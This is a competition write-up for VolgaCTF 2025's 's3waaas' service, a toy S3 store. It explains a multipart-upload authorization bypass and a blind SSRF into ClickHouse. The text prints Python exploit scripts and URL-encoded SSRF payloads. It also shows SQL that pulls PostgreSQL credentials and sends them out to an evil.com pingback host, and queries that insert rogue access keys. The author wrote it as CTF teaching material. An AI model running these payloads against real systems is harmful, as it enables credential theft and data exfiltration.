VolgaCTF 2025: s3waaas writeup

tags: #Web #Clickhouse
published: September 17, 2025
reading time: 9 minutes

# Intro

For this year’s VolgaCTF, I’ve made a toy S3 service in collaboration with WGH, the Bushwhackers CTF team captain. The service was written in Rust and used the s3s library for request parsing. It used a simple filesystem backend, PostgreSQL for storing bucket metadata, key pairs and access rights, and had a simple web frontend written in Flask for user registration and key pair management. The original idea was to introduce CTF teams to ClickHouse post-exploitation, so I decided to implement an “AWS-like” analytics feature to justify ClickHouse usage (it is an analytical database, after all). The idea of creating a toy S3 service came to me because I closely interact with a similar service at work. The service code can be downloaded here.

If you do not know what an attack-defense CTF is, you may have trouble understanding what is going on. This page might be your entry point to this wonderful world.

# API notes

To make the service structure easier to understand, here are a few words about the analytics feature. An example PutBucketAnalyticsConfiguration request looks like this:

Request:

PUT /?analytics&id=report1 HTTP/1.1
Host: examplebucket.s3.<Region>.amazonaws.com
Date: Mon, 31 Oct 2016 12:00:00 GMT
Authorization: authorization string
Content-Length: length
 
<?xml version="1.0" encoding="UTF-8"?>
<AnalyticsConfiguration xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Id>report1</Id>
  <Filter>
    <And>
      <Prefix>images/</Prefix>
      <Tag>
        <Key>dog</Key>
        <Value>corgi</Value>
      </Tag>
    </And>
  </Filter>
  <StorageClassAnalysis>
    <DataExport>
      <OutputSchemaVersion>V_1</OutputSchemaVersion>
      <Destination>
        <S3BucketDestination>
          <Format>CSV</Format>
          <BucketAccountId>123456789012</BucketAccountId>
          <Bucket>arn:aws:s3:::destination-bucket</Bucket>
          <Prefix>destination-prefix</Prefix>
        </S3BucketDestination>
      </Destination>
    </DataExport>
  </StorageClassAnalysis>
</AnalyticsConfiguration>

In AWS S3, after this request some statistics on items matching the <Filter> would be regularly written to the bucket configured via the AWS ARN in the <Bucket> tag. Note that Amazon exports different statistics; my toy service only exported request counts. Another difference is that AWS performs this export periodically, whereas the A/D service performed it just once to avoid DoS.

# Service structure

The service consisted of the following components:

The main S3 service, written in Rust. This part handled all S3 operations. It used PostgreSQL for bucket metadata storage and access checks. Also, for each successful request a row was written to ClickHouse.
PostgreSQL database, accessible without a password, with POSTGRES_HOST_AUTH_METHOD=trust.
ClickHouse server, with several restricted users.
Analytics job, which checked for recently created analytics configs, then for each found config performed the following operations:
1. A check for existence of the configured bucket via the ListObjects operation
2. A ClickHouse query to count the bucket access stats
3. A PutObject S3 operation to create an analytics CSV file in a configured bucket
4. Deletion of the analytics config
Authorization for selected S3 operations (ListObjects, PutObject) was bypassed via a special header. That header was stripped by the Nginx reverse proxy, so it was impossible to leverage it for exploitation.
A cleanup job to remove all old users, buckets and other artifacts
A simple web app for user registration and key management (should not contain vulnerabilities)
Nginx reverse proxy for routing requests and filtering the internal header

The checker checked the multipart upload functionality and working analytics.

# Vulnerabilities

The service came with two intended vulnerabilities: an authorization bypass during a limited time window and a blind SSRF. While the vulnerabilities could be considered easy to spot, the auth bypass was intentionally made unreliable, and the SSRF exploitation strategy was less obvious than the vulnerability itself.

# Auth bypass via multipart.uploads

The authorization bypass-related code is in the meta_storage.rs file:

pub async fn has_roles_for_bucket(
    &self,
    access_key_id: &str,
    user_id: &str,
    bucket: &str,
    access_key_roles: &Vec<String>,
    required_roles: &Vec<&str>,
) -> Result<bool, sqlx::Error> {
    let bucket_owner =
        sqlx::query_as::<_, (String,)>("SELECT owner_id FROM buckets WHERE name = $1")
            .bind(bucket)
            .fetch_optional(&self.pool)
            .await?;
    if let Some((owner_id,)) = bucket_owner {
        if owner_id != user_id {
            return Ok(false);
        }
    } else {
        return Ok(true);
    }
    ...
}

This means that there is no authorization for directories that are not present in the database but are present on the filesystem. The files storage backend in backend.rs uses the directory multipart.uploads for storing incomplete multipart uploads (for example, put_multipart_part writes to this directory). And as this directory is not registered as any bucket, any user can access it.

pub async fn put_multipart_part(
    &self,
    _bucket: &str,
    _key: &str,
    upload_id: &str,
    part_number: i32,
    mut body: s3s::dto::StreamingBlob,
) -> io::Result<(String, u64)> {
    use futures::StreamExt;
    use sha2::{Digest, Sha256};

    let multipart_dir = self.root.join(format!("multipart.uploads/{}", upload_id));

    let part_file = multipart_dir.join(format!("part-{:05}", part_number));
    let mut file = tokio::fs::File::create(&part_file).await?;

    let mut hasher = Sha256::new();
    let mut total_size = 0u64;

    while let Some(chunk) = body.next().await {
        let bytes = chunk.map_err(|e| io::Error::new(io::ErrorKind::Other, e))?;
        hasher.update(&bytes);
        total_size += bytes.len() as u64;
        file.write_all(&bytes).await?;
    }

    file.flush().await?;

    let etag = format!("{:x}", hasher.finalize());
    Ok((etag, total_size))
}

The check system uploads the flags as multipart S3 objects and intentionally pauses for 1 second before calling CompleteMultipartUpload. During this exploitation window, it is possible to steal the part containing the flag from any registered user. However, as the name of the directory is not known in advance, listing the bucket before calling GetObject is required.

def exploit():
    ak, sk = _register_and_create_keys(ENDPOINT)
    print(ak, sk)
    s3 = _get_s3_client(ENDPOINT, ak, sk)
    objects = s3.list_objects(Bucket="multipart.uploads")
    print(objects)
    for obj in objects["Contents"]:
        try:
            uploads = s3.get_object(Bucket="multipart.uploads", Key=obj["Key"].split("/")[-1] + "/part-00001")
            print(uploads["Body"].read())
        except Exception as e:
            print(e)
    print(objects)

Due to the short exploitation window and the possibility to clutter the multipart.uploads directory with unfinished uploads, this exploit is unreliable. This unreliability is intentional. While creating several vulnerabilities is a good A/D CTF practice, usually if the first easier vuln is reliable enough, further service audit and exploiting the harder vulnerability is not efficient in terms of CTF points.

# SSRF exploitation via ClickHouse

The second vulnerability is easy to find. The analytics job interprets the AWS region as the endpoint (which isn’t technically correct).

struct AwsArn {
    region: String,
    port: String,
    resource_id: Option<String>,
}

impl AwsArn {
    fn endpoint(&self) -> String {
        format!("http://{}:{}", self.region, self.port)
    }
}
...
async fn list_objects(
    &self,
    bucket: &str,
    arn: &AwsArn,
) -> Result<Vec<String>, Box<dyn std::error::Error>> {
    let url = format!("{}/{}", arn.endpoint(), bucket);
    ...
}

So with an ARN like arn:aws:s3:<hostname>:<port>:a we can make arbitrary requests. However, this is blind SSRF, so it is not immediately obvious what to do next. Remember that the flags are stored only as objects in buckets.

Several facts about ClickHouse:

It has many weird features, including
ClickHouse users can be configured with the readonly parameter. readonly=1 prohibits performing any mutations on the database, while readonly=2 allows creating temporary tables. Temporary tables are required for these weird remote functions. readonly=0 unrestricted users can change server settings via queries and cause DoS, which is undesirable.
Performing queries with HTTP GET should automatically set readonly=1, but for some reason it does not. Permissions for HTTP GET queries do not override preconfigured permissions (for example, with a config file).
By default, ClickHouse is configured with the user “default” and an empty password. Also, there are several users with hardcoded passwords which can be found in the users.xml config file. If no user is specified, the default user is used.

To exploit this vulnerability, the team is required to leverage the blind SSRF and combine several remote functions. For example, it is possible to steal authorization tokens with the following query:

WITH hui AS (
    select access_key_id, secret_key from postgresql('postgres:5432', 's3auth', 'access_keys', 's3', 's3pass')
) INSERT INTO
    FUNCTION url('http://attacker-pingback-endpoint.evil.com', 'CSV', 'column1 String, column2 String')
    SELECT * FROM hui;

where attacker-pingback-endpoint.evil.com is an attacker-controlled HTTP endpoint where the stolen credentials will be sent.

To trigger the SSRF, the following code might be used:

def exploit(target_endpoint, target_port, pb_host, pb_port):
    ak, sk = _register_and_create_keys(target_endpoint, target_port)
    print(ak, sk)
    s3 = _get_s3_client(target_endpoint, target_port, ak, sk)
    bucket = get_random_message(size=12).lower()
    s3.create_bucket(Bucket=bucket)
    pingback_endpoint = urllib.parse.quote(f'{pb_host}:{pb_port}')
    analytics_cfg = {
        "Id": get_random_message(size=12),
        "StorageClassAnalysis": {
            "DataExport": {
                "OutputSchemaVersion": "V_1",
                "Destination": {
                    "S3BucketDestination": {
                        "Format": "CSV",
                        "Bucket": f"arn:aws:s3:clickhouse:8123:?default_format=JSONEachRow&user=default&query=WITH%20hui%20AS%20(%20select%20access_key_id,%20secret_key,%20created_at%20from%20postgresql('postgres%3a5432',%0A's3auth',%20'access_keys',%20's3',%20's3pass'))%20INSERT%20INTO%20FUNCTION%0Aurl('http%3a//{pingback_endpoint}',%20'CSV',%20'column1%20String,%20column2%20String,%20column3%20String')%20SELECT%20*%0AFROM%20hui%20ORDER%20BY%20created_at%20DESC%20LIMIT%205",
                        "Prefix": "analytics/",
                    }
                },
            },
        },
    }
    s3.put_bucket_analytics_configuration(Bucket=bucket, Id=get_random_message(size=12), AnalyticsConfiguration=analytics_cfg)

Notice that the query requires ClickHouse credentials, so the default (empty password) or one of the other hardcoded users might be used. Also, strong PostgreSQL authentication will make the vulnerability impossible to exploit. However, the database was configured with POSTGRES_HOST_AUTH_METHOD=trust to make accidentally changing the PostgreSQL default password harder.

However, this exploitation method is not optimal as the stolen credentials have to be used later for accessing the flags, which requires more HTTP requests. Fortunately, as ClickHouse supports s3 functions, it is even possible to write a complex query which reads the flags! The query part which selects the flag values may look like this (if you want to select flag values for the last four rounds; keep in mind that the data may get clobbered by other team registrations without flags - attack data could be used to filter flag-bearing users. Also, the result of this query should later be exfiltrated to the attacker’s server the same way as in the above query):

WITH
    buckets as (SELECT name, owner_id FROM postgresql('postgres:5432', 's3auth', 'buckets', 's3', 's3pass')),
    ac as (SELECT * FROM postgresql('postgres:5432', 's3auth', 'access_keys', 's3', 's3pass')),
    keys_and_bucket_name as (select name, access_key_id, secret_key from ac join buckets on buckets.owner_id = ac.user_id),
    (SELECT access_key_id  FROM keys_and_bucket_name LIMIT 1) AS access_key_id_1,
    (SELECT secret_key FROM keys_and_bucket_name LIMIT 1) AS secret_access_key_1,
    (SELECT name FROM keys_and_bucket_name LIMIT 1) AS bucket_name_1,
    (SELECT access_key_id  FROM keys_and_bucket_name LIMIT 1 OFFSET 1) AS access_key_id_2,
    (SELECT secret_key FROM keys_and_bucket_name LIMIT 1  OFFSET 1) AS secret_access_key_2,
    (SELECT name FROM keys_and_bucket_name LIMIT 1  OFFSET 1) AS bucket_name_2,
        (SELECT access_key_id  FROM keys_and_bucket_name LIMIT 1 OFFSET 2) AS access_key_id_3,
    (SELECT secret_key FROM keys_and_bucket_name LIMIT 1  OFFSET 2) AS secret_access_key_3,
    (SELECT name FROM keys_and_bucket_name LIMIT 1  OFFSET 2) AS bucket_name_3,
        (SELECT access_key_id  FROM keys_and_bucket_name LIMIT 1 OFFSET 3) AS access_key_id_4,
    (SELECT secret_key FROM keys_and_bucket_name LIMIT 1  OFFSET 3) AS secret_access_key_4,
    (SELECT name FROM keys_and_bucket_name LIMIT 1  OFFSET 3) AS bucket_name_4
    

select * from s3(concat('http://s3-server:9001/', bucket_name_1, '/*'), access_key_id_1, secret_access_key_1, 'CSV', 'hui String')
UNION ALL
select * from s3(concat('http://s3-server:9001/', bucket_name_2, '/*'), access_key_id_2, secret_access_key_2, 'CSV', 'hui String')
UNION ALL
select * from s3(concat('http://s3-server:9001/', bucket_name_3, '/*'), access_key_id_3, secret_access_key_3, 'CSV', 'hui String')
UNION ALL
select * from s3(concat('http://s3-server:9001/', bucket_name_4, '/*'), access_key_id_4, secret_access_key_4, 'CSV', 'hui String')
;

# LLM notes

The service was pretty tough to vibe-hack because it’s larger than what you find on an average A/D CTF. My experiments showed that Cursor with GPT-5 (Thinking) finds both vulnerable code parts, but fails to understand how to exploit any of the vulnerabilities, as intended. Though I think that with some hints the agent should be able to exploit the first auth-bypass vulnerability. Actually, this task was written with LLM usage in mind to speed up the audit.

# Conclusion

The service was first-blooded by the LCD team on the 135th round of the game (after about 4:30 hours since the start of the game). They exploited the ClickHouse SSRF, but inserted known key pairs instead of using pingbacks, like this:

INSERT INTO TABLE FUNCTION
    postgresql('postgres','s3auth','access_keys','s3','','public')
    (access_key_id, secret_key, user_id) VALUES
    ('<access_key>', '<secret_key>', (
        SELECT owner_id FROM postgresql('postgres','s3auth','buckets','s3','', 'public')
        WHERE name = '<known_bucket_name_from_attack_data>'
    ))

and then add role for the key:

INSERT INTO TABLE FUNCTION
    postgresql('postgres','s3auth','access_key_roles','s3','','public')
    (access_key_id, access_key_role) VALUES
    ('<access_key>', 'view')